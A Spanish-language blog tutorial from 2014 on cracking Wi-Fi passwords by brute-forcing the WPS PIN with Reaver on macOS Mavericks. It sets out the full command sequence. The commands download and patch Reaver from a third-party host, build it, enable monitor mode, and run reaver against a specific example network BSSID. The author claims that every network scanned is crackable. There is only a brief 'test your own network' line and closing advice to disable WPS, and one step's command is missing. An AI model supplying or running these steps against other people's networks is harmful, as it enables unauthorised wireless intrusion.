[ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS

Martes 8 de abril de 2014, por Aitor Roma Vázquez

Se acostumbran a usar CD de pentest que funcionan bajo linux, como backtrack , Cali linux o Wifiway para comprobar la seguridad de una red wireless. Recomiendo que hagas esto en tu propia red para comprobar la seguridad de esta.

Esto son los pasos para Mac OS X Mavericks

Abrimos la terminal y creamos un enlace simbolico a airport así:

$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

Con este comando ya podremos llamar al programa airport directo desde el terminal.

Descargando y pacheando reaver

Reaver es una aplicación que se encarga de explotar las redes wifi utilizando ataques de fuerza bruta contra el WPS ( Wi-fi Protected Setup) , el WPS es un código numérico utilizado en muchos routers, para autenticar a dispositivos mobiles.

Reaver por defecto solo funciona en Linux. pero se puede pachear , para que funcione también en Mac OS.

Procedamos pues a la Instalación:

$ curl  "https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz"
$ curl http://www.redaven.com/download/reaver_osx.diff > reaver_osx.diff
$ tar xvfz reaver-1.4.tar.gz
$ cd reaver*/src
$ patch -p0 -i ../../reaver_osx.diff
$ ./configure
$ make
$ sudo make install 

Red en1 en modo monitor

Ahora abrimos una pestaña de la terminal presionando la tecla CMD + T
en esta terminal ejecutamos el siguiente comando.

$ sudo airport en1 sniff 1

Funcionamiento de Reaver

Analizamos las redes i miramos que no tengan bloqueado el WPS. eso lo logramos ejecutando el comando:

En este caso en todas se puede conseguir la password.

Ahora se debería poner reaver a la acción lo haríamos con el siguiente comando.

$ sudo reaver -i en1 -b [ La mac ] -vvvv -S -L 

En este caso por ejemplo para WLAN_07C0

$ sudo reaver -i en1 -b  74:88:8B:A6:07:C1 -vvvv -S -L 

Dentro de unas horas ya tenemos la clave de la red.

Aconsejo que no solo cambieis la password de vuestra red wireless ni el ESSID si no que busqueis dentro de las opciones wireless y desactiveis la opción que dice WPS.

Con esto será ya mucho más difícil acceder a las redes wireless ajenas.

Saludos!

21 Mensajes

Comentar este artículo